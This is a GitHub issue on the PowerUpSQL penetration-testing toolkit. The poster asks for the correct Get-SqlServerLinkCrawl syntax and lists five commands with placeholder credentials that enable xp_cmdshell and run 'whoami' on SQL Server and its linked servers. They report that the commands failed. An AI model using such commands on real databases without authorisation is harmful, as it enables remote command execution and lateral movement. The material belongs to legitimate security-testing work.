PowerUpSQL icon indicating copy to clipboard operation
PowerUpSQL copied to clipboard
verified publisher icon NetSPI

Document the Syntax for Get-SqlServerLinkCrawl

Open aress31 opened this issue 3 years ago • 0 comments

I spent some time trying to figure out the correct syntax to use with Get-SqlServerLinkCrawl to enabled xp_cmdshell and run system commands on all the DB on the links, but no luck. I gave up and switched to impacket mssql instead.

The commands I tried are as follows:

Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('sp_configure ''show advanced options'', 1')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('RECONFIGURE')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('sp_configure xp_cmdshell, 1')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('RECONFIGURE')"
Get-SQLServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
    -Query "EXECUTE('xp_cmdshell whoami')"

If someone could please let me know what is wrong with the above, that would be super!

aress31 avatar Aug 03 '22 14:08 aress31